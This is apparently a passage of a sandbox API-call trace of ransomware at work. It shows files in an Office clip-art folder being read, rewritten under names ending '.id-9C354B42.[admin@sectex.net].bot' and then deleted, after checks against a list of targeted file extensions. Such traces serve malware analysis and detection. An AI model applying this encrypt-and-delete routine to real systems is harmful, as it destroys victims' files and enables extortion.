	[0169.383] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.383] CloseHandle (hObject=0x1d8) returned 1
	[0169.384] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.384] SetEndOfFile (hFile=0x17c) returned 1
	[0169.386] CloseHandle (hObject=0x17c) returned 1
	[0169.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf")) returned 1
	[0169.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.387] lstrlenW (lpString=".doc") returned 4
	[0169.387] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.387] lstrlenW (lpString=".docx") returned 5
	[0169.387] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.387] lstrlenW (lpString=".pdf") returned 4
	[0169.387] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.387] lstrlenW (lpString=".xls") returned 4
	[0169.387] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.387] lstrlenW (lpString=".xlsx") returned 5
	[0169.387] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.387] lstrlenW (lpString=".ppt") returned 4
	[0169.387] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.387] lstrlenW (lpString=".zip") returned 4
	[0169.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.387] lstrlenW (lpString=".rar") returned 4
	[0169.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.387] lstrlenW (lpString=".bz2") returned 4
	[0169.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.387] lstrlenW (lpString=".7z") returned 3
	[0169.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.387] lstrlenW (lpString=".dbf") returned 4
	[0169.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.387] lstrlenW (lpString=".1cd") returned 4
	[0169.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString=".jpg") returned 4
	[0169.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString=".doc") returned 4
	[0169.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString=".docx") returned 5
	[0169.388] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.388] lstrlenW (lpString=".pdf") returned 4
	[0169.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString=".xls") returned 4
	[0169.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.388] lstrlenW (lpString=".xlsx") returned 5
	[0169.388] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.388] lstrlenW (lpString=".ppt") returned 4
	[0169.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString=".zip") returned 4
	[0169.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.388] lstrlenW (lpString=".rar") returned 4
	[0169.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString=".bz2") returned 4
	[0169.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString=".7z") returned 3
	[0169.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString=".dbf") returned 4
	[0169.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString=".1cd") returned 4
	[0169.388] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 63
	[0169.388] lstrlenW (lpString=".jpg") returned 4
	[0169.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.389] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.389] lstrlenW (lpString="J0153273.WMF") returned 12
	[0169.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.391] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=20096) returned 1
	[0169.391] CloseHandle (hObject=0x17c) returned 1
	[0169.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf")) returned 0x20
	[0169.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.393] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.393] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.394] GetLastError () returned 0x0
	[0169.394] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4e80, lpOverlapped=0x0) returned 1
	[0169.430] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4e90, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4e90, lpOverlapped=0x0) returned 1
	[0169.431] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.431] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.431] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.432] CloseHandle (hObject=0x1d8) returned 1
	[0169.432] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.432] SetEndOfFile (hFile=0x17c) returned 1
	[0169.434] CloseHandle (hObject=0x17c) returned 1
	[0169.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf")) returned 1
	[0169.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.435] lstrlenW (lpString=".doc") returned 4
	[0169.435] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.435] lstrlenW (lpString=".docx") returned 5
	[0169.435] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0169.435] lstrlenW (lpString=".pdf") returned 4
	[0169.435] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.435] lstrlenW (lpString=".xls") returned 4
	[0169.435] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.435] lstrlenW (lpString=".xlsx") returned 5
	[0169.435] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0169.435] lstrlenW (lpString=".ppt") returned 4
	[0169.435] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.435] lstrlenW (lpString=".zip") returned 4
	[0169.435] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.435] lstrlenW (lpString=".rar") returned 4
	[0169.435] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString=".bz2") returned 4
	[0169.436] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString=".7z") returned 3
	[0169.436] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.436] lstrlenW (lpString=".dbf") returned 4
	[0169.436] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.436] lstrlenW (lpString=".1cd") returned 4
	[0169.436] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.436] lstrlenW (lpString=".jpg") returned 4
	[0169.436] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.436] lstrlenW (lpString=".doc") returned 4
	[0169.436] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString=".docx") returned 5
	[0169.436] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0169.436] lstrlenW (lpString=".pdf") returned 4
	[0169.436] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString=".xls") returned 4
	[0169.436] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.436] lstrlenW (lpString=".xlsx") returned 5
	[0169.436] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0169.436] lstrlenW (lpString=".ppt") returned 4
	[0169.436] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.436] lstrlenW (lpString=".zip") returned 4
	[0169.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.436] lstrlenW (lpString=".rar") returned 4
	[0169.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString=".bz2") returned 4
	[0169.436] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.436] lstrlenW (lpString=".7z") returned 3
	[0169.437] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.437] lstrlenW (lpString=".dbf") returned 4
	[0169.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.437] lstrlenW (lpString=".1cd") returned 4
	[0169.437] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 63
	[0169.437] lstrlenW (lpString=".jpg") returned 4
	[0169.437] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.437] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.437] lstrlenW (lpString="J0153305.WMF") returned 12
	[0169.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.438] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=38488) returned 1
	[0169.438] CloseHandle (hObject=0x17c) returned 1
	[0169.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf")) returned 0x20
	[0169.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.438] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.438] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.439] GetLastError () returned 0x0
	[0169.439] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x9658, lpOverlapped=0x0) returned 1
	[0169.443] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x9660, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x9660, lpOverlapped=0x0) returned 1
	[0169.444] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.444] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.444] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.444] CloseHandle (hObject=0x1d8) returned 1
	[0169.444] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.444] SetEndOfFile (hFile=0x17c) returned 1
	[0169.447] CloseHandle (hObject=0x17c) returned 1
	[0169.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf")) returned 1
	[0169.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.448] lstrlenW (lpString=".doc") returned 4
	[0169.448] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.448] lstrlenW (lpString=".docx") returned 5
	[0169.448] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.448] lstrlenW (lpString=".pdf") returned 4
	[0169.448] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.448] lstrlenW (lpString=".xls") returned 4
	[0169.448] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.448] lstrlenW (lpString=".xlsx") returned 5
	[0169.448] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.448] lstrlenW (lpString=".ppt") returned 4
	[0169.448] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.448] lstrlenW (lpString=".zip") returned 4
	[0169.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.448] lstrlenW (lpString=".rar") returned 4
	[0169.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.448] lstrlenW (lpString=".bz2") returned 4
	[0169.448] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.448] lstrlenW (lpString=".7z") returned 3
	[0169.448] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.448] lstrlenW (lpString=".dbf") returned 4
	[0169.448] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString=".1cd") returned 4
	[0169.449] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString=".jpg") returned 4
	[0169.449] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString=".doc") returned 4
	[0169.449] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString=".docx") returned 5
	[0169.449] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.449] lstrlenW (lpString=".pdf") returned 4
	[0169.449] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString=".xls") returned 4
	[0169.449] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.449] lstrlenW (lpString=".xlsx") returned 5
	[0169.449] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.449] lstrlenW (lpString=".ppt") returned 4
	[0169.449] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString=".zip") returned 4
	[0169.449] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.449] lstrlenW (lpString=".rar") returned 4
	[0169.449] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString=".bz2") returned 4
	[0169.449] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString=".7z") returned 3
	[0169.449] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString=".dbf") returned 4
	[0169.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.449] lstrlenW (lpString=".1cd") returned 4
	[0169.449] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 63
	[0169.450] lstrlenW (lpString=".jpg") returned 4
	[0169.450] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.450] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.450] lstrlenW (lpString="J0153307.WMF") returned 12
	[0169.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.450] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=15448) returned 1
	[0169.450] CloseHandle (hObject=0x17c) returned 1
	[0169.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf")) returned 0x20
	[0169.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.451] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.451] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.452] GetLastError () returned 0x0
	[0169.452] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3c58, lpOverlapped=0x0) returned 1
	[0169.466] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3c60, lpOverlapped=0x0) returned 1
	[0169.467] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.467] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.467] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.467] CloseHandle (hObject=0x1d8) returned 1
	[0169.467] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.467] SetEndOfFile (hFile=0x17c) returned 1
	[0169.469] CloseHandle (hObject=0x17c) returned 1
